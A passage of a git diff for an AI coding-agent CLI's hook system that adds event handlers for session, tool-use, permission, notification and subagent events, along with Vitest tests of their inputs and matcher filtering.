vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + // Test Default mode + await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Default, + ); + let mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + let input = mockCalls[mockCalls.length - 1][2] as { + permission_mode: PermissionMode; + }; + expect(input.permission_mode).toBe(PermissionMode.Default); + + // Test Plan mode + await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Plan, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + permission_mode: PermissionMode; + }; + expect(input.permission_mode).toBe(PermissionMode.Plan); + + // Test Yolo mode + await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Yolo, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + permission_mode: PermissionMode; + }; + expect(input.permission_mode).toBe(PermissionMode.Yolo); + }); + }); + + describe('fireSubagentStartEvent', () => { + it('should execute hooks for SubagentStart event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSubagentStartEvent( + 'agent-123', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SubagentStart, + { agentType: 'code-reviewer' }, + ); + expect(result.success).toBe(true); + }); + + it('should 
include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSubagentStartEvent( + 'agent-456', + 'qwen-tester', + PermissionMode.Plan, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + agent_id: string; + agent_type: string; + permission_mode: PermissionMode; + hook_event_name: string; + }; + + expect(input.agent_id).toBe('agent-456'); + expect(input.agent_type).toBe('qwen-tester'); + expect(input.permission_mode).toBe(PermissionMode.Plan); + expect(input.hook_event_name).toBe(HookEventName.SubagentStart); + }); + + it('should pass agentType as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.fireSubagentStartEvent( + 'agent-789', + AgentType.Bash, + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SubagentStart, + { agentType: String(AgentType.Bash) }, + ); + }); + + it('should handle additional context in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + 
hookSpecificOutput: { + hookEventName: 'SubagentStart', + additionalContext: 'Injected context for subagent', + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSubagentStartEvent( + 'agent-111', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.hookSpecificOutput).toEqual({ + hookEventName: 'SubagentStart', + additionalContext: 'Injected context for subagent', + }); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSubagentStartEvent( + 'agent-seq', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('SubagentStart planner error'); + }); + + const result = await hookEventHandler.fireSubagentStartEvent( + 'agent-err', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('SubagentStart planner error'); + }); + }); + + describe('fireSubagentStopEvent', () => { + 
it('should execute hooks for SubagentStop event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSubagentStopEvent( + 'agent-123', + 'code-reviewer', + '/path/to/transcript.jsonl', + 'Final output from subagent', + false, + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SubagentStop, + { agentType: 'code-reviewer' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSubagentStopEvent( + 'agent-456', + 'qwen-tester', + '/transcript/path.jsonl', + 'last message from agent', + true, + PermissionMode.Yolo, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + agent_id: string; + agent_type: string; + agent_transcript_path: string; + last_assistant_message: string; + stop_hook_active: boolean; + permission_mode: PermissionMode; + hook_event_name: string; + }; + + expect(input.agent_id).toBe('agent-456'); + expect(input.agent_type).toBe('qwen-tester'); + expect(input.agent_transcript_path).toBe('/transcript/path.jsonl'); + expect(input.last_assistant_message).toBe('last message from 
agent'); + expect(input.stop_hook_active).toBe(true); + expect(input.permission_mode).toBe(PermissionMode.Yolo); + expect(input.hook_event_name).toBe(HookEventName.SubagentStop); + }); + + it('should pass agentType as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.fireSubagentStopEvent( + 'agent-789', + 'custom-agent', + '/path/transcript.jsonl', + 'output', + false, + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SubagentStop, + { agentType: 'custom-agent' }, + ); + }); + + it('should handle block decision in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + decision: 'block', + reason: 'Output too short, continue working', + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSubagentStopEvent( + 'agent-block', + 'code-reviewer', + '/path/transcript.jsonl', + 'short', + false, + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.decision).toBe('block'); + expect(result.finalOutput?.reason).toBe( + 'Output too short, continue working', + ); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = 
createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSubagentStopEvent( + 'agent-seq', + 'code-reviewer', + '/path/transcript.jsonl', + 'output', + false, + PermissionMode.Default, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('SubagentStop planner error'); + }); + + const result = await hookEventHandler.fireSubagentStopEvent( + 'agent-err', + 'code-reviewer', + '/path/transcript.jsonl', + 'output', + false, + PermissionMode.Default, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('SubagentStop planner error'); + }); + + it('should handle stop_hook_active flag correctly', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + // Test with stop_hook_active = false + await hookEventHandler.fireSubagentStopEvent( + 'agent-1', + 'code-reviewer', + '/path/transcript.jsonl', + 'output', + false, + PermissionMode.Default, + ); + let mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + let input = 
mockCalls[mockCalls.length - 1][2] as { + stop_hook_active: boolean; + }; + expect(input.stop_hook_active).toBe(false); + + // Test with stop_hook_active = true + await hookEventHandler.fireSubagentStopEvent( + 'agent-2', + 'code-reviewer', + '/path/transcript.jsonl', + 'output', + true, + PermissionMode.Default, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + stop_hook_active: boolean; + }; + expect(input.stop_hook_active).toBe(true); + }); }); }); diff --git a/packages/core/src/hooks/hookEventHandler.ts b/packages/core/src/hooks/hookEventHandler.ts index 2fd5f2892..16bc92b4a 100644 --- a/packages/core/src/hooks/hookEventHandler.ts +++ b/packages/core/src/hooks/hookEventHandler.ts @@ -15,7 +15,24 @@ import type { HookExecutionResult, UserPromptSubmitInput, StopInput, + SessionStartInput, + SessionEndInput, + SessionStartSource, + SessionEndReason, + AgentType, + PreToolUseInput, + PostToolUseInput, + PostToolUseFailureInput, + PreCompactInput, + PreCompactTrigger, + NotificationInput, + NotificationType, + PermissionRequestInput, + PermissionSuggestion, + SubagentStartInput, + SubagentStopInput, } from './types.js'; +import { PermissionMode } from './types.js'; import { createDebugLogger } from '../utils/debugLogger.js'; const debugLogger = createDebugLogger('TRUSTED_HOOKS'); @@ -73,6 +90,241 @@ export class HookEventHandler { return this.executeHooks(HookEventName.Stop, input); } + /** + * Fire a SessionStart event + * Called when a new session starts or resumes + */ + async fireSessionStartEvent( + source: SessionStartSource, + model: string, + permissionMode?: PermissionMode, + agentType?: AgentType, + ): Promise { + const input: SessionStartInput = { + ...this.createBaseInput(HookEventName.SessionStart), + permission_mode: permissionMode ?? 
PermissionMode.Default, + source, + model, + agent_type: agentType, + }; + + // Pass source as context for matcher filtering + return this.executeHooks(HookEventName.SessionStart, input, { + trigger: source, + }); + } + + /** + * Fire a SessionEnd event + * Called when a session ends + */ + async fireSessionEndEvent( + reason: SessionEndReason, + ): Promise { + const input: SessionEndInput = { + ...this.createBaseInput(HookEventName.SessionEnd), + reason, + }; + + // Pass reason as context for matcher filtering + return this.executeHooks(HookEventName.SessionEnd, input, { + trigger: reason, + }); + } + + /** + * Fire a PreToolUse event + * Called before tool execution begins + */ + async firePreToolUseEvent( + toolName: string, + toolInput: Record, + toolUseId: string, + permissionMode: PermissionMode, + ): Promise { + const input: PreToolUseInput = { + ...this.createBaseInput(HookEventName.PreToolUse), + permission_mode: permissionMode, + tool_name: toolName, + tool_input: toolInput, + tool_use_id: toolUseId, + }; + + // Pass tool name as context for matcher filtering + return this.executeHooks(HookEventName.PreToolUse, input, { + toolName, + }); + } + + /** + * Fire a PostToolUse event + * Called after successful tool execution + */ + async firePostToolUseEvent( + toolName: string, + toolInput: Record, + toolResponse: Record, + toolUseId: string, + permissionMode: PermissionMode, + ): Promise { + const input: PostToolUseInput = { + ...this.createBaseInput(HookEventName.PostToolUse), + permission_mode: permissionMode, + tool_name: toolName, + tool_input: toolInput, + tool_response: toolResponse, + tool_use_id: toolUseId, + }; + + // Pass tool name as context for matcher filtering + return this.executeHooks(HookEventName.PostToolUse, input, { + toolName, + }); + } + + /** + * Fire a PostToolUseFailure event + * Called when tool execution fails + */ + async firePostToolUseFailureEvent( + toolUseId: string, + toolName: string, + toolInput: Record, + errorMessage: 
string, + isInterrupt?: boolean, + permissionMode?: PermissionMode, + ): Promise { + const input: PostToolUseFailureInput = { + ...this.createBaseInput(HookEventName.PostToolUseFailure), + permission_mode: permissionMode ?? PermissionMode.Default, + tool_use_id: toolUseId, + tool_name: toolName, + tool_input: toolInput, + error: errorMessage, + is_interrupt: isInterrupt, + }; + + // Pass tool name as context for matcher filtering + return this.executeHooks(HookEventName.PostToolUseFailure, input, { + toolName, + }); + } + + /** + * Fire a PreCompact event + * Called before conversation compaction begins + */ + async firePreCompactEvent( + trigger: PreCompactTrigger, + customInstructions: string = '', + ): Promise { + const input: PreCompactInput = { + ...this.createBaseInput(HookEventName.PreCompact), + trigger, + custom_instructions: customInstructions, + }; + + // Pass trigger as context for matcher filtering + return this.executeHooks(HookEventName.PreCompact, input, { + trigger, + }); + } + + /** + * Fire a Notification event + */ + async fireNotificationEvent( + message: string, + notificationType: NotificationType, + title?: string, + ): Promise { + const input: NotificationInput = { + ...this.createBaseInput(HookEventName.Notification), + message, + notification_type: notificationType, + title, + }; + + // Pass notification_type as context for matcher filtering + return this.executeHooks(HookEventName.Notification, input, { + notificationType, + }); + } + + /** + * Fire a PermissionRequest event + * Called when a permission dialog is about to be shown to the user + */ + async firePermissionRequestEvent( + toolName: string, + toolInput: Record, + permissionMode: PermissionMode, + permissionSuggestions?: PermissionSuggestion[], + ): Promise { + const input: PermissionRequestInput = { + ...this.createBaseInput(HookEventName.PermissionRequest), + permission_mode: permissionMode, + tool_name: toolName, + tool_input: toolInput, + permission_suggestions: 
permissionSuggestions, + }; + + // Pass tool name as context for matcher filtering + return this.executeHooks(HookEventName.PermissionRequest, input, { + toolName, + }); + } + + /** + * Fire a SubagentStart event + * Called when a subagent is spawned via the Agent tool + */ + async fireSubagentStartEvent( + agentId: string, + agentType: AgentType | string, + permissionMode: PermissionMode, + ): Promise { + const input: SubagentStartInput = { + ...this.createBaseInput(HookEventName.SubagentStart), + permission_mode: permissionMode, + agent_id: agentId, + agent_type: agentType, + }; + + // Pass agentType as context for matcher filtering + return this.executeHooks(HookEventName.SubagentStart, input, { + agentType: String(agentType), + }); + } + + /** + * Fire a SubagentStop event + * Called when a subagent has finished responding + */ + async fireSubagentStopEvent( + agentId: string, + agentType: AgentType | string, + agentTranscriptPath: string, + lastAssistantMessage: string, + stopHookActive: boolean, + permissionMode: PermissionMode, + ): Promise { + const input: SubagentStopInput = { + ...this.createBaseInput(HookEventName.SubagentStop), + permission_mode: permissionMode, + stop_hook_active: stopHookActive, + agent_id: agentId, + agent_type: agentType, + agent_transcript_path: agentTranscriptPath, + last_assistant_message: lastAssistantMessage, + }; + + // Pass agentType as context for matcher filtering + return this.executeHooks(HookEventName.SubagentStop, input, { + agentType: String(agentType), + }); + } + /** * Execute hooks for a specific event (direct execution without MessageBus) * Used as fallback when MessageBus is not available diff --git a/packages/core/src/hooks/hookPlanner.test.ts b/packages/core/src/hooks/hookPlanner.test.ts index e3bb99076..85b1aae56 100644 --- a/packages/core/src/hooks/hookPlanner.test.ts +++ b/packages/core/src/hooks/hookPlanner.test.ts @@ -245,14 +245,14 @@ describe('HookPlanner', () => { const entry: HookRegistryEntry = { 
config: { type: HookType.Command, command: 'echo test' }, source: HooksConfigSource.Project, - eventName: HookEventName.SessionStart, - matcher: 'user', + eventName: HookEventName.PreCompact, + matcher: 'auto', enabled: true, }; vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); - const result = planner.createExecutionPlan(HookEventName.SessionStart, { - trigger: 'user', + const result = planner.createExecutionPlan(HookEventName.PreCompact, { + trigger: 'auto', }); expect(result).not.toBeNull(); @@ -262,14 +262,14 @@ describe('HookPlanner', () => { const entry: HookRegistryEntry = { config: { type: HookType.Command, command: 'echo test' }, source: HooksConfigSource.Project, - eventName: HookEventName.SessionStart, - matcher: 'user', + eventName: HookEventName.PreCompact, + matcher: 'auto', enabled: true, }; vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); - const result = planner.createExecutionPlan(HookEventName.SessionStart, { - trigger: 'api', + const result = planner.createExecutionPlan(HookEventName.PreCompact, { + trigger: 'manual', }); expect(result).toBeNull(); @@ -362,5 +362,356 @@ describe('HookPlanner', () => { expect(result).toBeNull(); }); + + it('should match notification type with exact string', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'permission_prompt', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'permission_prompt', + }); + + expect(result).not.toBeNull(); + }); + + it('should not match notification type with different string', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 
'permission_prompt', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'idle_prompt', + }); + + expect(result).toBeNull(); + }); + + it('should match idle_prompt notification type', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'idle_prompt', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'idle_prompt', + }); + + expect(result).not.toBeNull(); + }); + + it('should match auth_success notification type', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'auth_success', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'auth_success', + }); + + expect(result).not.toBeNull(); + }); + + it('should match elicitation_dialog notification type', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'elicitation_dialog', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'elicitation_dialog', + }); + + expect(result).not.toBeNull(); + }); + + it('should match all notification types when matcher is wildcard', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' 
}, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: '*', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'any_notification_type', + }); + + expect(result).not.toBeNull(); + }); + + it('should match all notification types when matcher is empty', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: '', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'any_notification_type', + }); + + expect(result).not.toBeNull(); + }); + + it('should match all notification types when no matcher provided', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'any_notification_type', + }); + + expect(result).not.toBeNull(); + }); + + it('should match all notification types when no context provided', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'permission_prompt', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification); + + expect(result).not.toBeNull(); + }); + + it('should match agent type with exact string for SubagentStart', () => { + const entry: 
HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: 'code-reviewer', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'code-reviewer', + }); + + expect(result).not.toBeNull(); + }); + + it('should not match agent type with different string for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: 'code-reviewer', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'qwen-tester', + }); + + expect(result).toBeNull(); + }); + + it('should match agent type with regex for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: '^code-.*', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'code-reviewer', + }); + + expect(result).not.toBeNull(); + }); + + it('should match agent type with wildcard for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: '*', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'any-agent', + }); + + expect(result).not.toBeNull(); + }); + + 
it('should match all agent types when no context for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: 'code-reviewer', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart); + + expect(result).not.toBeNull(); + }); + + it('should match all agent types when no matcher for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'any-agent', + }); + + expect(result).not.toBeNull(); + }); + + it('should match agent type with exact string for SubagentStop', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStop, + matcher: 'qwen-tester', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStop, { + agentType: 'qwen-tester', + }); + + expect(result).not.toBeNull(); + }); + + it('should not match agent type with different string for SubagentStop', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStop, + matcher: 'qwen-tester', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStop, { + agentType: 'code-reviewer', + }); 
+ + expect(result).toBeNull(); + }); + + it('should match agent type with regex for SubagentStop', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStop, + matcher: '.*tester$', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStop, { + agentType: 'qwen-tester', + }); + + expect(result).not.toBeNull(); + }); + + it('should fallback to exact match when regex is invalid for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: '[invalid(regex', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'code-reviewer', + }); + + expect(result).toBeNull(); + }); + + it('should match using fallback exact match when regex is invalid for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: '[invalid(regex', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: '[invalid(regex', + }); + + expect(result).not.toBeNull(); + }); + + it('should match regex wildcard .* for SubagentStop', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStop, + matcher: '.*', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const 
result = planner.createExecutionPlan(HookEventName.SubagentStop, { + agentType: 'any-agent-type', + }); + + expect(result).not.toBeNull(); + }); }); }); diff --git a/packages/core/src/hooks/hookPlanner.ts b/packages/core/src/hooks/hookPlanner.ts index 3eef01543..23628c712 100644 --- a/packages/core/src/hooks/hookPlanner.ts +++ b/packages/core/src/hooks/hookPlanner.ts @@ -6,7 +6,7 @@ import type { HookRegistry, HookRegistryEntry } from './hookRegistry.js'; import type { HookExecutionPlan } from './types.js'; -import { getHookKey, type HookEventName } from './types.js'; +import { getHookKey, HookEventName } from './types.js'; import { createDebugLogger } from '../utils/debugLogger.js'; const debugLogger = createDebugLogger('TRUSTED_HOOKS'); @@ -34,9 +34,9 @@ export class HookPlanner { return null; } - // Filter hooks by matcher + // Filter hooks by matcher - pass eventName for explicit dispatch const matchingEntries = hookEntries.filter((entry) => - this.matchesContext(entry, context), + this.matchesContext(entry, eventName, context), ); if (matchingEntries.length === 0) { @@ -64,10 +64,14 @@ export class HookPlanner { } /** - * Check if a hook entry matches the given context + * Check if a hook entry matches the given context. + * Uses explicit event-based dispatch to avoid ambiguity between events + * that share similar context fields (e.g., SessionStart and SubagentStart + * both have agentType, but use different matcher semantics). 
*/ private matchesContext( entry: HookRegistryEntry, + eventName: HookEventName, context?: HookEventContext, ): boolean { if (!entry.matcher || !context) { @@ -80,17 +84,80 @@ export class HookPlanner { return true; // Empty string or wildcard matches all } - // For tool events, match against tool name - if (context.toolName) { - return this.matchesToolName(matcher, context.toolName); - } + // Explicit dispatch by event name to avoid ambiguity + switch (eventName) { + // Tool events: match against tool name + case HookEventName.PreToolUse: + case HookEventName.PostToolUse: + case HookEventName.PostToolUseFailure: + case HookEventName.PermissionRequest: + return context.toolName + ? this.matchesToolName(matcher, context.toolName) + : true; - // For other events, match against trigger/source - if (context.trigger) { - return this.matchesTrigger(matcher, context.trigger); - } + // Subagent events: match against agent type + case HookEventName.SubagentStart: + case HookEventName.SubagentStop: + return context.agentType + ? this.matchesAgentType(matcher, context.agentType) + : true; - return true; + // PreCompact: match against trigger + case HookEventName.PreCompact: + return context.trigger + ? this.matchesTrigger(matcher, context.trigger) + : true; + + // Notification: match against notification type + case HookEventName.Notification: + return context.notificationType + ? this.matchesNotificationType(matcher, context.notificationType) + : true; + + // SessionStart/SessionEnd: match against source/reason + case HookEventName.SessionStart: + return context.trigger + ? this.matchesSessionTrigger(matcher, context.trigger) + : true; + + case HookEventName.SessionEnd: + return context.trigger + ? 
